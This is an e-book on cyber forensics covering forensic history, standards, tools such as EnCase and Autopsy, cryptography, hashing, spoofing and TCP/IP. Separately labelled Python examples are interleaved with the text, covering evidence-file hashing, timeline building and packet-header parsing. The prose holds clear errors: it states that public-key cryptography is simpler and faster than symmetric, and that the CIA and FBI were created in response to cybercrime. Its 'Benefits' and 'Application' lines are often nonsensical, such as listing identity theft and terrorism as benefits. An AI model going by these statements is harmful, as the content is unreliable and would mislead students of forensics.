Cyber Forensics and Law: E-BOOK
Page 1 of 135
UNIT - 1 Introduction
Introduction 8/17/2015
Introduction to Computer forensics
Computer forensics is the equivalent of surveying a crime scene or performing an autopsy on a victim. The word forensic means forum or discussion. Forensic science has seven subdivisions. Computer forensics is applied across all aspects of an investigation. Benefits: it concerns a wide range of crimes and disputes, such as fraud and theft.
History: the word forensic has its roots in Latin and generally means forum or discussion. Anyone charged with a crime was presented before an assembly of the public, and both the complainant and the defendant presented their sides through their own speeches.
Forensic science subdivisions and application: forensic pathology applies the principles of medicine to determine a cause of death or injury; forensic accounting is the study and interpretation of accounting evidence; forensic anthropology is the recovery and identification of skeletonized human remains; forensic archaeology combines archaeological techniques with forensic science; forensic chemistry is the detection and identification of illicit drugs and accelerants; forensic DNA analysis answers forensic questions such as paternity/maternity testing or placing a person at a scene; forensic entomology studies the insects around human remains to assist in determining the time or location of death. Application: each subdivision involves its own conceptualization. Benefits: the ability to work with different situations and concepts of cause.
Computer forensic timeline: 1970s: the first crime cases involving computers, mainly financial fraud. 1980s: the Norton Utilities "Unerase" tool was created; SEARCH High Tech Crimes training was created; regular classes began to be taught to Federal agents in California and at FLETC in Georgia; then HTCIA was formed in Southern California. 1984: the FBI Magnetic Media Program was created; it later became the Computer Analysis and Response Team (CART).
Computer forensic timeline (continued): 1987: AccessData, a cyber forensic company, was formed. 1988: creation of IACIS, the International Association of Computer Investigative Specialists. 1993: the first International Conference on Computer Evidence was held. 1995: the International Organization on Computer Evidence (IOCE) was formed. 1997: the G8 countries, meeting in Moscow, declared that "Law enforcement personnel must be trained and equipped to address high-tech crimes". 1998: the G8 appointed the IOCE to create international principles, guidelines and procedures relating to digital evidence, and the INTERPOL Forensic Science Symposium was held. 1999: the FBI CART case load exceeded 2000 cases, examining 17 terabytes of data. 2000: the first FBI Regional Computer Forensic Laboratory was established. 2003: the FBI CART case load exceeded 6500 cases, examining 782 terabytes of data. Benefits: each stage of computer forensic practice was developed on top of the previous one.
Computer forensic & Standards
Whenever possible, do not examine the original media. Write-protect the original, copy it, and examine only the copy. Use write-blocking technology to preserve the original. Examination results should be reviewed by a supervisor. All hardware and software should be tested to ensure they produce accurate and reliable results. Forensic examiners must remain objective at all times. Application: write-blocking technology to preserve the original. Benefits: accurate and reliable results.
Basic work: the following steps are considered the basic work: preparation, collection, examination, analysis and reporting. Process: "Forensic computing is the process of identifying, preserving, analyzing and presenting digital evidence in a manner that is legally acceptable." What is collection: the first phase of the process is to identify, label, record, and acquire data from the possible sources of relevant data. Application: record the acquired data. What is examination: examinations involve forensically processing large amounts of collected data, using a combination of automated and manual methods, to assess and extract data of particular interest. Application: to assess and extract data. What is analysis: the next phase of the process is to analyze the results of the examination, using legally justifiable methods and techniques, to derive useful information that addresses the questions of the case. This information may in turn guide further collection and examination. Application: to derive useful information from the examination.
What is reporting: the final phase is reporting the results of the analysis. This may include describing the actions taken, explaining how tools and procedures were selected, and determining what other actions need to be performed. Providing recommendations for improvement to policies, guidelines, procedures, tools, and other aspects of the forensic process is also part of the final phase. Application: providing recommendations for improvement to policies, guidelines, procedures and tools.
Introduction to Computer Forensics Investigation
Computer forensics investigation covers data recovery, password cracking, online investigation and expert testimony.
What is cybercrime? The growing list of cybercrimes includes crimes that have been made possible by computers, such as network intrusions and the dissemination of computer viruses, as well as computer-based variations of existing crimes, such as identity theft, stalking, bullying and terrorism. Example: network intrusions. Application: dissemination of computer viruses. Benefits: identity theft, stalking, bullying and terrorism.
Computer crime: the computer as a target means attacking the computers of others (spreading viruses is an example). The computer as a weapon means using a computer to commit "traditional crime" that we see in the physical world (such as fraud or illegal gambling). The computer as an accessory means using a computer as a "fancy filing cabinet" to store illegal or stolen information. Example: spreading viruses. Application: storing illegal or stolen information.
Cybercrime overview: computer crime refers to any crime that involves a computer and a network. The computer may have been used to carry out the crime, for example in the case of stalking, or it may be the target, for example of a virus. Example: stalking. Benefits: to carry out the crime.
Examples of cybercrime: in June 2012 LinkedIn and eHarmony were attacked, compromising 65 million passwords. Twitter was hacked and 250,000 passwords were leaked.
Cybercrime types: theft of telecommunications services has occurred. Communications channels have been used in furtherance of criminal conspiracies. Telecommunications piracy has been carried out by many actors. Sales and investment frauds have happened. Electronic funds transfer fraud has happened. Application: each type involves its own conceptualization.
Cybercrime problem: telecommunications infrastructure has been attacked through electronic vandalism, which has paved the way for terrorism and extortion. Fraud has continued in the form of theft of telecommunications services and piracy. Pornography and other offensive material have been distributed. Other areas of fraud have occurred in telemarketing, electronic funds transfer crime and electronic money laundering.
Jobs exist: on the other hand, many useful things were developed. Separate law enforcement units were established; as part of this development the CIA and FBI were created. Local police departments and sheriffs were equipped with modern equipment. Private-sector jobs in information security were created, and separate cyber technology posts were created in companies. Accounting firms created new jobs in the technology field, and law firms had to hire more technical people to handle technical work. The most powerful field of any country is the military, which eventually had to field many technology people; they carried out surveys using sophisticated equipment, and many interception jobs were created.
Qualities of good investigators: the highest level of ethics is needed. One has to be unbiased, one should have good documentation skills, and one should know when to call for help. Application: to help others at critical times. Benefits: to raise awareness.
UNIT - 2 Cyber Forensics Tools and Utilities
Cyber Forensics Tools and Utilities 8/17/2015
Introduction to Cyber Forensics tools
Forensic tools fall into the following types: disk imaging software, software or hardware write-blocking tools, hashing tools and primary tools.
Primary forensic tools are classified into the following types. EnCase from Guidance Software is the primary tool; when EnCase fails, FTK is the second choice. X-Ways, from X-Ways Software Technology, is another tool. DFF (Digital Forensics Framework) is another tool, and it can be used on Linux.
Live forensics: for simple live forensics use Linux from the forensic distros: Helix from e-fense; CAINE from caine-live.net; F-Response from www.f-response.com; FIM tools from Sysinternals; Live View from sourceforge.net. These are great free tools for live forensics. Application: they can be used for live forensics and for booting Linux.
Mobile devices: this includes not only mobile phones but also PDAs, iPods, video cameras, photo cameras, MP3 players, etc. XRY and XACT are very good, but they are very expensive. Device Seizure from Paraben is nice for PDA examination.
Data recovery: advanced recovery needs electronic and mechanical parts replacement. PC-3000 from ACE Laboratory handles HDD and SSD diagnostics and password resetting. R-Studio is the first tool to try to recover any remaining data. Foremost is available from foremost.sourceforge.net. CD/DVD Inspector from InfinaDyne is used for CD/DVD examination.
Data erasing: standard file deletion keeps the data intact; this is among the first rules taught in forensic classes. Data wiping is one solution. DBAN from www.dban.org is the easiest way to wipe an HDD. Eraser from www.eraser.heidi.ie, a simple Windows application, is also used for erasing data.
Password recovery: the Password Recovery Toolkit is obtained from accessdata.com, and further tools are available from www.elcomsoft.com.
Coroner's Toolkit
The Coroner's Toolkit (TCT) is a suite of computer security programs written by Dan Farmer and Wietse Venema. It is used to assist in digital forensic analysis.
Toolkit installation: currently the following OSs are at least semi-supported: FreeBSD 2-4.*, OpenBSD 2.*, BSD/OS 2-4.*, SunOS 4-5.*, Linux 2.*. Example: the more recent versions, i.e. those after June 24, 2000.
Encase Forensic
EnCase is a suite of digital forensics products by Guidance Software. The software comes in several forms designed for forensic, cyber security and e-discovery use. The company also offers EnCase training and certification.
Product line of EnCase: EnCase technology is available within a number of products, which currently include EnCase Forensic, EnCase Cybersecurity, EnCase eDiscovery, and EnCase Portable. Guidance Software also runs training courses and certification.
Features of EnCase Forensic: EnCase contains tools for several areas of the digital forensic process: acquisition, analysis and reporting. It also includes a scripting facility called EnScript with various APIs.
EnCase Evidence File Format: EnCase contains functionality to create forensic images of suspect media. Images are stored in the proprietary EnCase Evidence File Format. The compressible file format is prefixed with case data information and consists of a bit-by-bit (i.e. exact) copy of the media with CRC hashes for every 64K of data. The file format also appends an MD5 hash of the entire drive as a footer. Benefits: the creation of forensic images of suspect media.
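As an added worked example (not part of this e-book, and a simplified layout rather than the real EWF/E01 byte format), the Python below builds a container with the structure just described: a case data prefix, the media copied bit-by-bit in 64 KiB chunks each followed by its CRC, and an MD5 of the whole media as the footer. The verifier recomputes everything and pinpoints which chunk was altered. The case string and media bytes are constructed sample data.

```python
import hashlib
import struct
import zlib

CHUNK_SIZE = 64 * 1024  # the page describes a CRC for every 64K of data


def build_evidence_file(case_info: bytes, media: bytes) -> bytes:
    """Build a simplified evidence container: [case len][case info][media len]
    then each 64 KiB chunk followed by its CRC32, then the MD5 of all media as footer.
    Illustrative layout only, not the real EnCase/EWF format."""
    out = bytearray()
    out += struct.pack("<I", len(case_info)) + case_info
    out += struct.pack("<Q", len(media))
    for off in range(0, len(media), CHUNK_SIZE):
        chunk = media[off:off + CHUNK_SIZE]
        out += chunk
        out += struct.pack("<I", zlib.crc32(chunk) & 0xFFFFFFFF)
    out += hashlib.md5(media).digest()
    return bytes(out)


def verify_evidence_file(blob: bytes) -> dict:
    """Re-read the container, recompute every chunk CRC and the MD5 footer,
    and report the case info, media length, any chunks whose CRC no longer
    matches, and whether the footer MD5 still matches."""
    pos = 0
    (case_len,) = struct.unpack_from("<I", blob, pos)
    pos += 4
    case_info = blob[pos:pos + case_len]
    pos += case_len
    (media_len,) = struct.unpack_from("<Q", blob, pos)
    pos += 8
    md5 = hashlib.md5()
    bad_chunks = []
    idx, remaining = 0, media_len
    while remaining > 0:
        n = min(CHUNK_SIZE, remaining)
        chunk = blob[pos:pos + n]
        pos += n
        (stored_crc,) = struct.unpack_from("<I", blob, pos)
        pos += 4
        if zlib.crc32(chunk) & 0xFFFFFFFF != stored_crc:
            bad_chunks.append(idx)   # CRC localises damage to one chunk
        md5.update(chunk)
        remaining -= n
        idx += 1
    footer = blob[pos:pos + 16]
    return {"case_info": case_info, "media_len": media_len,
            "bad_chunks": bad_chunks, "md5_ok": footer == md5.digest()}


# Constructed sample: 2.5 chunks of pseudo-media plus a tail, not a real disk image.
SAMPLE_MEDIA = bytes(range(256)) * 640 + b"END"   # 163843 bytes -> 3 chunks
SAMPLE_CASE = b"case=CONSTRUCTED-001;examiner=example"


def demo_tamper() -> dict:
    """Build the container, flip one byte inside the second chunk, and verify:
    the MD5 footer fails and the CRC list names exactly chunk 1."""
    blob = bytearray(build_evidence_file(SAMPLE_CASE, SAMPLE_MEDIA))
    header_len = 4 + len(SAMPLE_CASE) + 8
    target = header_len + (CHUNK_SIZE + 4) + 10   # 10 bytes into chunk 1's data
    blob[target] ^= 0xFF
    return verify_evidence_file(bytes(blob))


if __name__ == "__main__":
    print(verify_evidence_file(build_evidence_file(SAMPLE_CASE, SAMPLE_MEDIA)))
    print(demo_tamper())
```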
Analyst's Notebook
Analyst's Notebook is a software product produced by i2 Limited and used for data analysis and investigation. It is used as part of the Human Terrain System, a US Army program which embeds social scientists with combat brigades. An investigation into fraud in the U.S. Army is reported to have used Analyst's Notebook capabilities.
i2 Analyst's Notebook offers rich visual analysis designed to help analysts and their organizations turn large sets of disparate information into high-quality intelligence that supports many operations, aiding them to identify, predict and prevent criminal, terrorist and fraudulent activities.
Analyst's Notebook benefits: quickly identify patterns in data that would otherwise be missed using single analytical approaches; reduce the time to deliver rich, actionable intelligence; increase the depth of intelligence for more effective results.
LogLogic's LX 2000 log analysis tool
LogLogic's LX 2000 is an excellent log analysis tool. It is powerful and can be distributed, and it is a mature and useful product, but it is not for the faint-hearted: while its user interface is excellent, it has many hidden capabilities.
Features of the log analysis tool: its displays are straightforward, and one can perform a wide variety of analyses with relative ease. Coupled with the ST 3000 large-scale storage appliance, the LX 2000 becomes an extremely powerful tool for managing, analyzing and archiving huge amounts of data.
NetWitness
NetWitness Corporation was a Reston, Virginia-based network security company. It provided real-time network forensics and automated threat analysis solutions. In 2011, NetWitness was acquired by EMC Corporation.
NetWitness people: NetWitness' former CEO, Amit Yoran, was formerly Director of the National Cyber Security Division of the Department of Homeland Security. NetWitness also employed Shawn Carpenter, a notable security analyst who discovered Operation Titan Rain in 2005.
About MANDIANT
MANDIANT are engineers, consultants, authors, instructors and security experts. They have chased criminals who were attacking the Fortune 500, government contractors and multinational banks, and have responded to over 1 million compromised systems in over 60 organizations. They find evil and solve crime through their products and services.
Network analysis: identify activities in near real-time; detect and collect known malicious network traffic; perform post-processing and decryption; describe attackers' activities and movement; determine the intent and process of compromise.
Autopsy: Autopsy is a user interface that makes it simpler to deploy many of the open-source programs and plugins of The Sleuth Kit collection.
Tool design principles: the tool should be extensible, should provide frameworks, and should be easy to use.
Extensible functionality: the user should be able to add new functionality by creating plugins that can analyze all or part of the underlying data source.
Frameworks
The tool offers standard approaches for ingesting data, analyzing it and reporting any findings, so that developers can follow the same design patterns when possible.
Ease of use: the Autopsy browser must offer wizards and history tools that make it easier for users to repeat their steps without excessive reconfiguration.
Fast: Autopsy runs background tasks in parallel using multiple cores and provides results as soon as they are available. It may take hours to search the whole drive, but you will know within minutes.
Cost effective: Autopsy is free of cost, and cost-effective digital forensics solutions are essential. Autopsy offers the same core features as other digital forensics tools, and also offers features that other commercial tools do not provide. Example: web artifact analysis and registry analysis.
Analysis modes: there are two analysis modes, dead analysis and live analysis, described below.
Dead analysis: a dead analysis occurs when a dedicated analysis system is used to examine the data from a suspect system. In this case Autopsy and The Sleuth Kit are run in a trusted environment, typically in a lab. Autopsy and TSK support raw, Expert Witness, and AFF file formats.
Live analysis: a live analysis occurs when the suspect system is analyzed while it is running. In this case Autopsy and The Sleuth Kit are run from a CD in an untrusted environment. Once an incident is confirmed, the system can be acquired and a dead analysis performed.
Evidence search technique
Search techniques: the following are the searching techniques: file listing, file content, hash databases, file type sorting, timeline of file activity, keyword search, meta data analysis, data unit analysis and image details.
File listing: analyze the files and directories, including the names of deleted files and files with Unicode-based names.
File content: the contents of a file can be viewed in raw or hex form, or the ASCII strings can be extracted. When data is interpreted, Autopsy sanitizes it to prevent damage, so the local analysis system is protected. Autopsy does not use any client-side scripting languages.
Hash databases: look up unknown files in a hash database to quickly identify them as good or bad. Autopsy uses the NIST National Software Reference Library (NSRL) and user-created databases of known-good and known-bad files.
File type sorting: files are sorted by their internal signatures to identify files of a known type. Autopsy can also extract only graphic images (including thumbnails). The extension of the file is also compared to the file type, which helps identify files whose extension may have been changed to hide them.
Timeline of file activity: in some cases a timeline of file activity can help identify areas of a file system that may contain evidence. Autopsy can create timelines that contain entries for the Modified, Access, and Change (MAC) times of both allocated and unallocated files.
Keyword search: keyword searches of the file system image can be performed using ASCII strings and grep regular expressions. Searches can be performed on the full file system image, and an index file can be created for faster searches.
Meta data analysis: meta data structures contain the details about files and directories. Autopsy allows viewing the details of any meta data structure in the file system, and will search the directories to identify the full path of the file that has allocated the structure. Application: this is useful for recovering deleted content.
Data unit analysis: data units are where the file content is stored. Autopsy allows viewing the contents of any data unit in a variety of formats, including ASCII, hexdump, and strings, and will search the meta data structures to identify which one has allocated the data unit.
Image details: file system details can be viewed for an image, including the on-disk layout and times of activity. This mode provides information that is useful during data recovery.
Case Management
Investigations are organized by cases. A case can contain one or more hosts, each host is configured with its own time zone setting and clock skew, and each host can contain one or more file system images to analyze. The case management features are: event sequencer, notes, image integrity, reports, logging, open design and client-server model.
Event sequencer: time-based events can be added from file activity or from IDS and firewall logs. Autopsy sorts the events so that the sequence of incident events can be more easily determined.
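Added example covering both the MAC timeline (file activity, above in Evidence search technique) and the event sequencer just described; it is not the e-book's or Autopsy's code. It merges one file's MAC times and a firewall log line into a single timeline, applying each host's time zone and clock skew from the case configuration. Host names, times and the log line are constructed.

```python
from datetime import datetime, timedelta, timezone

# Per-host case configuration as the page describes: each host has its own time zone
# and clock skew. Here skew = how far the host's clock runs AHEAD of true time (constructed values).
HOSTS = {
    "ws01": {"tz": timezone(timedelta(hours=5, minutes=30)), "skew": timedelta(minutes=3)},
    "fw":   {"tz": timezone.utc, "skew": timedelta(0)},
}


def mac_events(host, path, mtime, atime, ctime, allocated=True):
    """Expand one file's Modified/Access/Change (MAC) times into three timeline entries.
    Times are naive datetimes exactly as read from the host (its local clock and zone)."""
    tag = "alloc" if allocated else "unalloc"
    return [{"host": host, "time": t, "kind": k, "desc": f"{path} ({tag})"}
            for t, k in ((mtime, "M"), (atime, "A"), (ctime, "C"))]


def log_event(host, line):
    """Parse a constructed 'YYYY-MM-DD HH:MM:SS SOURCE message' line (IDS or firewall style)."""
    date, clock, source, message = line.split(" ", 3)
    return {"host": host, "time": datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M:%S"),
            "kind": source, "desc": message}


def to_utc(event, hosts=HOSTS):
    """Attach the host's time zone, convert to UTC, then remove the host's clock skew."""
    cfg = hosts[event["host"]]
    local = event["time"].replace(tzinfo=cfg["tz"])
    return local.astimezone(timezone.utc) - cfg["skew"]


def build_timeline(events, hosts=HOSTS):
    """Normalise every event to true UTC and sort, so cross-host order is meaningful."""
    out = [dict(e, utc=to_utc(e, hosts)) for e in events]
    out.sort(key=lambda e: (e["utc"], e["host"], e["kind"]))
    return out


# Constructed sample: a file on ws01 (IST clock running 3 min fast) and one firewall line (UTC).
SAMPLE_EVENTS = (
    mac_events("ws01", "/home/u/downloads/tool.exe",
               mtime=datetime(2015, 8, 17, 14, 33, 0),
               atime=datetime(2015, 8, 17, 14, 35, 0),
               ctime=datetime(2015, 8, 17, 14, 33, 0))
    + [log_event("fw", "2015-08-17 09:02:30 FW outbound 10.0.0.5 -> 203.0.113.9 allowed")]
)


def timeline_summary(events=SAMPLE_EVENTS, hosts=HOSTS):
    return [(e["utc"].strftime("%Y-%m-%d %H:%M:%S"), e["host"], e["kind"], e["desc"])
            for e in build_timeline(events, hosts)]


def kinds_in_order(correct_skew=True):
    """Order of event kinds with and without applying the configured clock skew:
    ignoring a 3-minute skew reverses which came first, the file or the connection."""
    hosts = HOSTS if correct_skew else {h: dict(c, skew=timedelta(0)) for h, c in HOSTS.items()}
    return [e["kind"] for e in build_timeline(SAMPLE_EVENTS, hosts)]


if __name__ == "__main__":
    for row in timeline_summary():
        print(row)
    print("with skew:", kinds_in_order(True), "without:", kinds_in_order(False))
```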
Notes: notes can be saved on a per-host and per-investigator basis. They allow you to make quick notes about files and structures, and the original location can be easily recalled. All notes are stored in an ASCII file.
Image integrity: it is crucial to ensure that files are not modified during analysis. Autopsy, by default, generates an MD5 value for all files that are imported or created, and the integrity of any file that Autopsy uses can be validated at any time.
Reports: Autopsy can create ASCII reports for files and other file system structures, which makes it quick to produce consistent data sheets during the investigation.
Logging: audit logs are created at the case, host and investigator level so that actions can be easily recalled. The exact Sleuth Kit commands that are executed are also logged.
Open design: the code of Autopsy is open source and all files that it uses are in a raw format. All configuration files are in ASCII text, which makes it easy to export the data and archive it. It also does not restrict you from using other tools that may solve a specific problem more appropriately.
Client-server model: Autopsy is HTML-based, so you do not have to be on the same system as the file system images. This allows multiple investigators to use the same server and connect from their personal systems.
UNIT - 3 Concealment Techniques
Concealment Techniques 8/17/2015
Spoliation
The spoliation of evidence is the intentional or negligent withholding, hiding, altering or destroying of evidence relevant to a legal proceeding.
Cryptography
In cryptography, a key is a piece of information (a parameter) that determines the functional output of a cryptographic algorithm or cipher. Without a key, the algorithm would produce no useful result.
Function of cryptography: cryptography is used to protect email messages, to preserve credit card information, and to protect corporate data.
Classification: there are two types of cryptography, symmetric-key systems and public-key systems.
Public-key cryptography: public-key cryptography, also known as asymmetric cryptography, refers to a cryptographic algorithm which requires two separate keys, one of which is secret (or private) and the other of which is public.
Advantages: the main advantages of public-key systems are that they are simpler and much faster.
Private-key cryptography: symmetric encryption is also called private-key or secret-key encryption. It involves using the same key for encryption and decryption.
Why is key secrecy needed? A key is often easier to protect than an encryption algorithm, since it is typically a small piece of information, and it is also easier to change if compromised. Application: protecting all kinds of personal information.
Scope of a key: the keys are generated first and then used with a given suite of algorithms. This setup is called a cryptosystem.
Size of key: a key length of 80 bits is generally considered the minimum for strong security with symmetric encryption algorithms. 128-bit keys are commonly used and considered very strong.
Key choice: to prevent a key from being guessed, keys need to be generated truly randomly and with sufficient entropy. The problem of how to safely generate truly random keys is difficult, and has been addressed in many ways by various cryptographic systems.
Hashing function
A hash function is any algorithm that maps data of arbitrary length to data of a fixed length. The values returned by a hash function are called hash values; other names are hash codes, hash sums, checksums or simply hashes.
Hash tables: hash functions are primarily used in hash tables, to quickly locate a data record given its search key. Example: a dictionary definition.
Caches: hash functions are also used to build caches for large data sets stored in slow media. A cache is generally simpler than a hashed search table, since any collision can be resolved by discarding or writing back the older item.
Bloom filters: hash functions are an essential ingredient of the Bloom filter, a space-efficient probabilistic data structure used to test whether an element is a member of a set.
Hash value: a hash value, also called a message digest, is a number generated from a string of text. The hash value is substantially smaller than the text itself, and it is generated by the hash algorithm in such a way that the chance of some other text producing the same hash value is negligible.
Hash function algorithms: trivial hash function, perfect hashing, minimal perfect hashing.
List of hash functions: NIST hash function competition, Pearson hashing, Zobrist hashing.
Spoofing
In the context of network security, a spoofing attack is a situation in which one person or program successfully masquerades as another by falsifying data, and thereby gains an illegitimate advantage.
TCP/IP: many of the protocols in the TCP/IP suite do not provide mechanisms for authenticating the source or destination of a message.
Referrer spoofing: some websites, especially pornographic pay sites, allow access to their materials only from certain approved pages. This is enforced by checking the referrer header of the HTTP request. This referrer header, however, can be changed; this is known as "referrer spoofing" or "Ref-tar spoofing".
File-sharing networks: spoofing can also refer to copyright holders placing distorted or unlistenable versions of works on file-sharing networks.
Caller ID spoofing: public telephone networks often provide Caller ID information, which includes the caller's name and number. However, some technologies allow callers to forge Caller ID information and present false names and numbers.
Email address spoofing: the sender information shown in emails can be spoofed easily. This technique is commonly used by spammers to hide the origin of their emails, and it leads to problems such as misdirected bounces. Example: email spam backscatter.
GPS spoofing: a GPS spoofing attack attempts to deceive a GPS receiver by broadcasting counterfeit GPS signals structured to resemble a set of normal GPS signals, or by rebroadcasting genuine signals captured elsewhere or at a different time.
Internet Protocol
The Internet Protocol (IP) is the principal communications protocol in the Internet protocol suite for relaying datagrams across network boundaries. Its routing function enables internetworking and essentially establishes the Internet.
Function of IP: IP is responsible for addressing hosts and for routing datagrams from a source host to a destination host across one or more IP networks. For this purpose, the Internet Protocol defines and provides an addressing system with two functions: identifying hosts and providing a logical location service. Application: identifying hosts and providing a logical location service.
Datagram: each datagram consists of two components, a header and a payload. The IP header is tagged with the source IP address, the destination IP address, and other metadata needed to route and deliver the datagram. The payload is the data that is transported.
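Added example, not from the e-book: Python that builds and parses the IPv4 datagram header just described (source, destination and the metadata needed to route it), verifies the header checksum, and shows that the checksum protects integrity but says nothing about whether the source address is genuine, which is the gap the Spoofing section refers to. Addresses are from documentation ranges and the payloads are constructed.

```python
import ipaddress
import struct

# version/IHL, TOS, total length, identification, flags+fragment offset, TTL, protocol,
# header checksum, source address, destination address (RFC 791, network byte order)
IPV4_HEADER = "!BBHHHBBH4s4s"


def header_checksum(header: bytes) -> int:
    """RFC 791 header checksum: one's complement of the one's-complement sum of 16-bit words."""
    if len(header) % 2:
        header += b"\x00"
    total = sum((header[i] << 8) | header[i + 1] for i in range(0, len(header), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_datagram(src: str, dst: str, payload: bytes, proto=6, ttl=64, ident=0x1234) -> bytes:
    """Construct a minimal IPv4 datagram (20-byte header, no options, DF set) around a payload."""
    hdr = struct.pack(IPV4_HEADER, (4 << 4) | 5, 0, 20 + len(payload), ident, 0x4000, ttl, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    hdr = hdr[:10] + struct.pack("!H", header_checksum(hdr)) + hdr[12:]
    return hdr + payload


def parse_datagram(datagram: bytes) -> dict:
    """Split a datagram into its header fields and payload and re-verify the header checksum."""
    ver_ihl, _tos, total_len, ident, flags_frag, ttl, proto, csum, src, dst = \
        struct.unpack(IPV4_HEADER, datagram[:20])
    ihl = (ver_ihl & 0x0F) * 4
    header = datagram[:ihl]
    recomputed = header_checksum(header[:10] + b"\x00\x00" + header[12:])
    return {
        "version": ver_ihl >> 4,
        "header_len": ihl,
        "total_len": total_len,
        "id": ident,
        "dont_fragment": bool(flags_frag & 0x4000),
        "ttl": ttl,
        "protocol": proto,
        "src": str(ipaddress.IPv4Address(src)),
        "dst": str(ipaddress.IPv4Address(dst)),
        "checksum_ok": recomputed == csum,
        "payload": datagram[ihl:total_len],
    }


SAMPLE = build_datagram("192.0.2.10", "198.51.100.7", b"hello")


def tampered_sample() -> bytes:
    """Same datagram with the TTL changed in transit and the checksum left stale."""
    d = bytearray(SAMPLE)
    d[8] = 1
    return bytes(d)


def claimed_source_is_unverified() -> bool:
    """The source field is whatever the sender wrote: two datagrams that differ only in the
    claimed source both pass the integrity check, so a receiver cannot tell which is genuine."""
    a = parse_datagram(build_datagram("192.0.2.10", "198.51.100.7", b"hi"))
    b = parse_datagram(build_datagram("203.0.113.5", "198.51.100.7", b"hi"))
    return a["checksum_ok"] and b["checksum_ok"] and a["src"] != b["src"]


if __name__ == "__main__":
    print(parse_datagram(SAMPLE))
    print("tampered checksum ok:", parse_datagram(tampered_sample())["checksum_ok"])
```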
Capacity and capability: the dynamic nature of the Internet and the diversity of its components provide no guarantee that any particular path is actually capable of, or suitable for, performing the data transmission requested.
Reliability: the Internet Protocol uses the end-to-end principle in its design. Under this design, the network infrastructure is assumed to be inherently unreliable at any single network element or transmission medium, and dynamic in terms of the availability of links and nodes.
Transmission Control
TCP stands for Transmission Control Protocol. It is one of the core protocols of the Internet protocol suite (IP), and it is so common that the entire suite is called TCP/IP.
Connection: TCP uses a three-way handshake to establish a connection: SYN, SYN-ACK, ACK.
SYN: the active open is performed by the client sending a SYN to the server. The client sets the segment's sequence number to a random value A.
SYN-ACK The server replies with a SYN-ACK. The acknowledgment number is set to one more than the received sequence number, A+1, and the sequence number chosen for this segment is another random number B.
ACK Finally the client sends an ACK back to the server. Its sequence number is the received acknowledgment value, A+1, and its acknowledgment number is one more than the received sequence number, B+1.
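The datagram layout described above and the A/B sequence-number arithmetic of the handshake, as an added example (not from the original text): a pure-Python parser for an IPv4 header followed by a TCP header, with the IPv4 header checksum verified, plus a check that three segments form a consistent SYN / SYN-ACK / ACK exchange. The packets are constructed inline as sample input with made-up addresses and ports; TCP checksums are left at zero because the example is about the header fields, not the wire.

```python
import struct

IP_PROTO_TCP = 6
TCP_FIN, TCP_SYN, TCP_RST, TCP_PSH, TCP_ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def ip_checksum(header: bytes) -> int:
    """RFC 791 checksum: one's complement of the one's-complement sum of 16-bit words.
    Over a header whose checksum field is already filled in the result is 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_packet(src, dst, sport, dport, seq, ack, flags, payload=b""):
    """Constructed IPv4+TCP packet used as sample input (TCP checksum left at 0)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0) + payload
    src_b = bytes(int(o) for o in src.split("."))
    dst_b = bytes(int(o) for o in dst.split("."))
    # version/IHL, TOS, total length, id, flags/frag, TTL, protocol, checksum, src, dst
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000, 64, IP_PROTO_TCP, 0, src_b, dst_b)
    ip = ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:]
    return ip + tcp


def parse_packet(pkt: bytes) -> dict:
    """Parse the IPv4 header (verifying its checksum) and the TCP header that follows it."""
    ver_ihl, tos, total_len, ident, frag, ttl, proto, csum, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20:
        raise ValueError("not an IPv4 header")
    if ip_checksum(pkt[:ihl]) != 0:
        raise ValueError("bad IPv4 header checksum")
    if proto != IP_PROTO_TCP:
        raise ValueError("not TCP")
    sport, dport, seq, ack, off_res, flags, win, tcsum, urg = struct.unpack("!HHIIBBHHH", pkt[ihl:ihl + 20])
    data_off = (off_res >> 4) * 4
    return {
        "src": ".".join(map(str, src)), "dst": ".".join(map(str, dst)), "ttl": ttl,
        "sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags,
        "payload": pkt[ihl + data_off:ihl + total_len],
    }


def header_ok(pkt: bytes) -> bool:
    try:
        parse_packet(pkt)
        return True
    except ValueError:
        return False


def check_handshake(pkts) -> str:
    """Verify three segments form SYN / SYN-ACK / ACK with the A+1 / B+1 relationship."""
    if len(pkts) != 3:
        return "need exactly three segments"
    s, sa, a = (parse_packet(p) for p in pkts)
    if s["flags"] & (TCP_SYN | TCP_ACK) != TCP_SYN:
        return "first segment is not a bare SYN"
    if sa["flags"] & (TCP_SYN | TCP_ACK) != TCP_SYN | TCP_ACK:
        return "second segment is not SYN-ACK"
    if a["flags"] & (TCP_SYN | TCP_ACK) != TCP_ACK:
        return "third segment is not a bare ACK"
    if (sa["src"], sa["sport"], sa["dst"], sa["dport"]) != (s["dst"], s["dport"], s["src"], s["sport"]):
        return "SYN-ACK does not reverse the SYN's 4-tuple"
    A, B = s["seq"], sa["seq"]
    if sa["ack"] != (A + 1) & 0xFFFFFFFF:
        return "SYN-ACK acknowledges wrong number (expected A+1)"
    if a["seq"] != (A + 1) & 0xFFFFFFFF or a["ack"] != (B + 1) & 0xFFFFFFFF:
        return "ACK seq/ack do not match A+1 / B+1"
    return "ok"


def sample_handshake():
    """Constructed exchange with A = 1000 and B = 5000 (made-up hosts 10.0.0.1 and 10.0.0.2)."""
    return [
        build_packet("10.0.0.1", "10.0.0.2", 40000, 80, 1000, 0, TCP_SYN),
        build_packet("10.0.0.2", "10.0.0.1", 80, 40000, 5000, 1001, TCP_SYN | TCP_ACK),
        build_packet("10.0.0.1", "10.0.0.2", 40000, 80, 1001, 5001, TCP_ACK),
    ]


if __name__ == "__main__":
    print(check_handshake(sample_handshake()))
```

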